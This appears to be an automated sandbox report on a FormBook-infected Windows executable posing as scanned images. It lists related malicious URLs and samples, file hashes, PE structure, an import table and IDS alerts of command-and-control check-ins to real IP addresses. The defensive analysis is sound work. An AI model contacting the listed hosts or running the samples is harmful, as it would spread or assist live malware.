AMAZON-02US | https://imtcoken.im/ | malicious | Unknown | 143.204.215.6
AMAZON-02US | http://www.toekan.im/ | malicious | Unknown | 143.204.215.6
COGENT-174US | 8e8JUOzOjR.exe | malicious | DBatLoader | 23.237.26.135
COGENT-174US | https://urlz.fr/tJIZ | malicious | Unknown | 143.244.197.139
COGENT-174US | 3e31414a-0c65-4866-9783-41979ca0d50e.eml | malicious | Unknown | 154.26.153.101
COGENT-174US | New Order#12125.exe | malicious | FormBook | 154.39.239.237
COGENT-174US | http://id1223.adsalliance.xyz | malicious | Unknown | 143.244.38.136
COGENT-174US | elitebotnet.mpsl.elf | malicious | Mirai, Okiru | 149.42.52.10
COGENT-174US | elitebotnet.sh4.elf | malicious | Mirai, Okiru | 38.189.68.123
COGENT-174US | 3.elf | malicious | Unknown | 38.220.172.156
COGENT-174US | CSZ inquiry for MH raw material.exe | malicious | FormBook | 154.39.239.237
COGENT-174US | trow.exe | malicious | Unknown | 154.53.43.150
                                                                              No context
                                                                              No context
                                                                              Process:C:\Windows\SysWOW64\verclsid.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                              Category:dropped
                                                                              Size (bytes):114688
                                                                              Entropy (8bit):0.9746603542602881
                                                                              Encrypted:false
                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                              Malicious:false
                                                                              Reputation:high, very likely benign file
                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):287232
                                                                              Entropy (8bit):7.995079098920299
                                                                              Encrypted:true
                                                                              SSDEEP:6144:orQn/2I9aKhtl3bxYfWuLbuWfDqv2c7pUfFKNJ0a2tjuwPAcJGn:o24UtlrIWuvuYY7yMX0a8jHPAb
                                                                              MD5:10ED5D34A0330BDC9F7848B7FBA6B7A7
                                                                              SHA1:1E5599D63A3CA6FC8D1B2981E29E39EBBACEA98B
                                                                              SHA-256:D2DC5D56A99E4D6A08B9C8457679FC58E11AD1CF810CAE48AF4B623319459E47
                                                                              SHA-512:33034D70F7A4A2BD9961B2B246C9920B69ECF5FD8BA68DD164F582FEC193F121E0AC29F116D01F4DDC051B9160F07D51FF1C01930A762419060411ACAF07ABEB
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:xh...XAHB..@......X6..}[I...WDI8DM95PX52NAUXAHBMWDI8DM95PX.2NA[G.FB.^.h.E....0\An1'7&:# w'(V*"M.2=.@;/u1/h...d$W (.8]R.2NAUXAH;L^.tX#..U7..R).O..x-0.S...U7./..i8&..$4,tX#.95PX52NA..AH.LVD?.U/95PX52NA.XCIIL\DIh@M95PX52NA.LAHB]WDIX@M95.X5"NAUZAHDMWDI8DM?5PX52NAU8EHBOWDI8DM;5..52^AUHAHBMGDI(DM95PX%2NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDgL!5M5PX.}JAUHAHB.SDI(DM95PX52NAUXAHbMW$I8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX
                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Entropy (8bit):7.4188758028769195
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:Scanned-IMGS_from NomanGroup IDT.scr.exe
                                                                              File size:1'613'824 bytes
                                                                              MD5:17cbb82b7db7a77df6507dd32af10563
                                                                              SHA1:816fc79a0d8dc1ea493779e01f21f99c00a9229d
                                                                              SHA256:744a3efa374159a40ea07cf1c6a295f40fef90685421d20ceda619847dbe6165
                                                                              SHA512:0917ff1f5eca9d620e3829ccbaed79f892c85195917fc420077e5d7004fd8d5cdd71cbc2abd6a27d672f6fe98947faf6aec5a797dd5de64cb1fbe09481621747
                                                                              SSDEEP:24576:2qDEvCTbMWu7rQYlBQcBiT6rprG8aKXAwXiEoFKrQO8wkoPuGwQVZqc/ByR61UFl:2TvC/MTQYxsWR7aKfXZr0pQuAW+sr
                                                                              TLSH:1075E0027381C062FF9B92734B5AF6115BBC69660123A62F13A81DBDFD701B1563E7A3
                                                                              File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
                                                                              Icon Hash:aaf3e3e3938382a0
                                                                              Entrypoint:0x420577
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x6785B72C [Tue Jan 14 01:00:28 2025 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:5
                                                                              OS Version Minor:1
                                                                              File Version Major:5
                                                                              File Version Minor:1
                                                                              Subsystem Version Major:5
                                                                              Subsystem Version Minor:1
                                                                              Import Hash:948cc502fe9226992dce9417f952fce3
                                                                              Instruction
                                                                              call 00007F05A8839483h
                                                                              jmp 00007F05A8838D8Fh
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              push esi
                                                                              push dword ptr [ebp+08h]
                                                                              mov esi, ecx
                                                                              call 00007F05A8838F6Dh
                                                                              mov dword ptr [esi], 0049FDF0h
                                                                              mov eax, esi
                                                                              pop esi
                                                                              pop ebp
                                                                              retn 0004h
                                                                              and dword ptr [ecx+04h], 00000000h
                                                                              mov eax, ecx
                                                                              and dword ptr [ecx+08h], 00000000h
                                                                              mov dword ptr [ecx+04h], 0049FDF8h
                                                                              mov dword ptr [ecx], 0049FDF0h
                                                                              ret
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              push esi
                                                                              push dword ptr [ebp+08h]
                                                                              mov esi, ecx
                                                                              call 00007F05A8838F3Ah
                                                                              mov dword ptr [esi], 0049FE0Ch
                                                                              mov eax, esi
                                                                              pop esi
                                                                              pop ebp
                                                                              retn 0004h
                                                                              and dword ptr [ecx+04h], 00000000h
                                                                              mov eax, ecx
                                                                              and dword ptr [ecx+08h], 00000000h
                                                                              mov dword ptr [ecx+04h], 0049FE14h
                                                                              mov dword ptr [ecx], 0049FE0Ch
                                                                              ret
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              push esi
                                                                              mov esi, ecx
                                                                              lea eax, dword ptr [esi+04h]
                                                                              mov dword ptr [esi], 0049FDD0h
                                                                              and dword ptr [eax], 00000000h
                                                                              and dword ptr [eax+04h], 00000000h
                                                                              push eax
                                                                              mov eax, dword ptr [ebp+08h]
                                                                              add eax, 04h
                                                                              push eax
                                                                              call 00007F05A883BB2Dh
                                                                              pop ecx
                                                                              pop ecx
                                                                              mov eax, esi
                                                                              pop esi
                                                                              pop ebp
                                                                              retn 0004h
                                                                              lea eax, dword ptr [ecx+04h]
                                                                              mov dword ptr [ecx], 0049FDD0h
                                                                              push eax
                                                                              call 00007F05A883BB78h
                                                                              pop ecx
                                                                              ret
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              push esi
                                                                              mov esi, ecx
                                                                              lea eax, dword ptr [esi+04h]
                                                                              mov dword ptr [esi], 0049FDD0h
                                                                              push eax
                                                                              call 00007F05A883BB61h
                                                                              test byte ptr [ebp+08h], 00000001h
                                                                              pop ecx
                                                                              Programming Language:
                                                                              • [ C ] VS2008 SP1 build 30729
                                                                              • [IMP] VS2008 SP1 build 30729
                                                                              Name | Virtual Address | Virtual Size | Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc8e64 | 0x17c | .rdata
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd4000 | 0xb35ec | .rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x188000 | 0x7594 | .reloc
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb0ff0 | 0x1c | .rdata
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                              IMAGE_DIRECTORY_ENTRY_TLS | 0xc3400 | 0x18 | .rdata
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb1010 | 0x40 | .rdata
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                              IMAGE_DIRECTORY_ENTRY_IAT | 0x9c000 | 0x894 | .rdata
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                              Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                              .text | 0x1000 | 0x9ab1d | 0x9ac00 | 0a1473f3064dcbc32ef93c5c8a90f3a6 | False | 0.565500681542811 | data | 6.668273581389308 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .rdata | 0x9c000 | 0x2fb82 | 0x2fc00 | c9cf2468b60bf4f80f136ed54b3989fb | False | 0.35289185209424084 | data | 5.691811547483722 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .data | 0xcc000 | 0x706c | 0x4800 | 53b9025d545d65e23295e30afdbd16d9 | False | 0.04356553819444445 | DOS executable (block device driver @\273\) | 0.5846666986982398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .rsrc | 0xd4000 | 0xb35ec | 0xb3600 | 591bed869cb6d434460ffbe7270704eb | False | 0.963825675087108 | data | 7.962847579133983 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .reloc | 0x188000 | 0x7594 | 0x7600 | c68ee8931a32d45eb82dc450ee40efc3 | False | 0.7628111758474576 | data | 6.7972128181359786 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                              Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                                              RT_ICON | 0xd45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
                                                                              RT_ICON | 0xd46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
                                                                              RT_ICON | 0xd47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
                                                                              RT_ICON | 0xd4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
                                                                              RT_ICON | 0xd4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
                                                                              RT_ICON | 0xd4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
                                                                              RT_ICON | 0xd5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
                                                                              RT_ICON | 0xd6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
                                                                              RT_ICON | 0xd69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
                                                                              RT_ICON | 0xd8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
                                                                              RT_ICON | 0xda038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
                                                                              RT_MENU | 0xda4a0 | 0x50 | data | English | Great Britain | 0.9
                                                                              RT_STRING | 0xda4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
                                                                              RT_STRING | 0xdaa84 | 0x68a | data | English | Great Britain | 0.2735961768219833
                                                                              RT_STRING | 0xdb110 | 0x490 | data | English | Great Britain | 0.3715753424657534
                                                                              RT_STRING | 0xdb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
                                                                              RT_STRING | 0xdbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
                                                                              RT_STRING | 0xdc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
                                                                              RT_STRING | 0xdc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
                                                                              RT_RCDATA | 0xdc7b8 | 0xaa8b4 | data | | | 1.0003163705285822
                                                                              RT_GROUP_ICON | 0x18706c | 0x76 | data | English | Great Britain | 0.6610169491525424
                                                                              RT_GROUP_ICON | 0x1870e4 | 0x14 | data | English | Great Britain | 1.25
                                                                              RT_GROUP_ICON | 0x1870f8 | 0x14 | data | English | Great Britain | 1.15
                                                                              RT_GROUP_ICON | 0x18710c | 0x14 | data | English | Great Britain | 1.25
                                                                              RT_VERSION | 0x187120 | 0xdc | data | English | Great Britain | 0.6181818181818182
                                                                              RT_MANIFEST | 0x1871fc | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
                                                                              DLL | Import
                                                                              WSOCK32.dll | gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                                              VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                              WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
                                                                              COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                              MPR.dll | WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                                              WININET.dll | HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                                              PSAPI.DLL | GetProcessMemoryInfo
                                                                              IPHLPAPI.DLL | IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                                              USERENV.dll | DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                                              UxTheme.dll | IsThemeActive
                                                                              KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                                                                              USER32.dll | GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                                                              GDI32.dll | EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                                                              COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
                                                                              ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                                                              SHELL32.dll | DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                                              ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                              OLEAUT32.dll | CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
                                                                              Language of compilation system | Country where language is spoken | Map
                                                                              English | Great Britain |
                                                                              Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                                              2025-01-14T10:24:28.619902+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49223 | 13.248.169.48 | 80 | TCP
                                                                              2025-01-14T10:24:53.839685+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 57319 | 206.119.82.172 | 80 | TCP
                                                                              2025-01-14T10:24:56.387302+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 57320 | 206.119.82.172 | 80 | TCP
                                                                              2025-01-14T10:24:58.924134+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 57327 | 206.119.82.172 | 80 | TCP
                                                                              2025-01-14T10:25:01.443609+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 57343 | 206.119.82.172 | 80 | TCP
                                                                              2025-01-14T10:25:07.096702+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 57374 | 67.223.117.142 | 80 | TCP
                                                                              2025-01-14T10:25:09.625077+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 57395 | 67.223.117.142 | 80 | TCP
                                                                              2025-01-14T10:25:12.197696+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 57411 | 67.223.117.142 | 80 | TCP
                                                                              2025-01-14T10:25:14.747221+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 57427 | 67.223.117.142 | 80 | TCP
                                                                              2025-01-14T10:25:20.684968+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 57463 | 162.0.215.244 | 80 | TCP
                                                                              2025-01-14T10:25:23.176391+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 57479 | 162.0.215.244 | 80 | TCP
                                                                              2025-01-14T10:25:25.619691+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 57496 | 162.0.215.244 | 80 | TCP
                                                                              2025-01-14T10:25:28.132064+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 57512 | 162.0.215.244 | 80 | TCP
                                                                              2025-01-14T10:25:33.752152+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 57544 | 3.33.130.190 | 80 | TCP
                                                                              2025-01-14T10:25:36.292105+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 57557 | 3.33.130.190 | 80 | TCP
                                                                              2025-01-14T10:25:38.843157+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 57570 | 3.33.130.190 | 80 | TCP
                                                                              2025-01-14T10:25:41.405894+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 57583 | 3.33.130.190 | 80 | TCP
                                                                              2025-01-14T10:25:55.782922+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 57600 | 38.47.233.52 | 80 | TCP
